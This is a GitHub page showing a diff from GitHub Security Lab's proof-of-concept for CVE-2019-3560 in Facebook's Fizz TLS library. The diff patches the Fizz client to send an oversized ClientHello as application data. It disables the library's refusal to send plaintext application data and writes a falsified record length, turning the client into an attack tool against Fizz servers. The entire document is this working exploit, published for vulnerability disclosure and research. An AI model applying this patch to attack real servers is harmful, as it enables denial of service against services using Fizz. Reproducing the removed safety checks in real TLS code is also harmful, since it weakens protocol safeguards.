securitylab/SecurityExploits/Facebook/Fizz/CVE-2019-3560/attacker/home/diff.txt at xnu-macos10.13.3-codeql-database · github/securitylab · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
diff --git a/fizz/client/ClientProtocol.cpp b/fizz/client/ClientProtocol.cpp
index 8804de7..82bdbbd 100644
--- a/fizz/client/ClientProtocol.cpp
+++ b/fizz/client/ClientProtocol.cpp
@@ -450,7 +450,7 @@ static ClientHello getClientHello(
     chlo.extensions.push_back(encodeExtension(std::move(modes)));
   }

-  if (earlyDataParams) {
+  if (true || earlyDataParams) {
     chlo.extensions.push_back(encodeExtension(ClientEarlyData()));
   }

@@ -1186,6 +1186,8 @@ Actions EventHandler<
   } else {
     encodedClientHello = encodeHandshake(std::move(chlo));
     handshakeContext->appendToTranscript(encodedClientHello);
+    encodedClientHello->reserve(0, 0x11000);
+    encodedClientHello->append(0x11000);
   }

   auto earlyDataType = state.earlyDataType() == EarlyDataType::Attempted
@@ -1194,7 +1196,7 @@ Actions EventHandler<

   WriteToSocket clientFlight;
   auto chloWrite =
-      state.writeRecordLayer()->writeHandshake(encodedClientHello->clone());
+      state.writeRecordLayer()->writeAppData(encodedClientHello->clone());

   bool sentCCS = state.sentCCS();
   folly::Optional<client::Action> ccsWrite;
diff --git a/fizz/client/FizzClientContext.h b/fizz/client/FizzClientContext.h
index 9def034..7508098 100644
--- a/fizz/client/FizzClientContext.h
+++ b/fizz/client/FizzClientContext.h
@@ -220,7 +220,7 @@ class FizzClientContext {
       SignatureScheme::rsa_pss_sha256};
   std::vector<NamedGroup> supportedGroups_ = {NamedGroup::x25519,
                                               NamedGroup::secp256r1};
-  std::vector<NamedGroup> defaultShares_ = {NamedGroup::x25519};
+  std::vector<NamedGroup> defaultShares_ = {NamedGroup::secp521r1};
   std::vector<PskKeyExchangeMode> supportedPskModes_ = {
       PskKeyExchangeMode::psk_dhe_ke,
       PskKeyExchangeMode::psk_ke};
diff --git a/fizz/record/PlaintextRecordLayer.cpp b/fizz/record/PlaintextRecordLayer.cpp
index e33ef9e..ce33252 100644
--- a/fizz/record/PlaintextRecordLayer.cpp
+++ b/fizz/record/PlaintextRecordLayer.cpp
@@ -112,22 +112,24 @@ TLSContent PlaintextWriteRecordLayer::writeInitialClientHello(
 TLSContent PlaintextWriteRecordLayer::write(
     TLSMessage msg,
     ProtocolVersion recordVersion) const {
+#if 0
   if (msg.type == ContentType::application_data) {
     throw std::runtime_error("refusing to send plaintext application data");
   }
+#endif

   auto fragment = std::move(msg.fragment);
   folly::io::Cursor cursor(fragment.get());
   std::unique_ptr<folly::IOBuf> data;
   while (!cursor.isAtEnd()) {
     Buf thisFragment;
-    auto len = cursor.cloneAtMost(thisFragment, kMaxPlaintextRecordSize);
+    auto len = cursor.cloneAtMost(thisFragment, 0x20000);

     auto header = folly::IOBuf::create(kPlaintextHeaderSize);
     folly::io::Appender appender(header.get(), kPlaintextHeaderSize);
     appender.writeBE(static_cast<ContentTypeType>(msg.type));
     appender.writeBE(static_cast<ProtocolVersionType>(recordVersion));
-    appender.writeBE<uint16_t>(len);
+    appender.writeBE<uint16_t>(len < 0x1000 ? len : 0x10000-kPlaintextHeaderSize);

     if (!data) {
       data = std::move(header);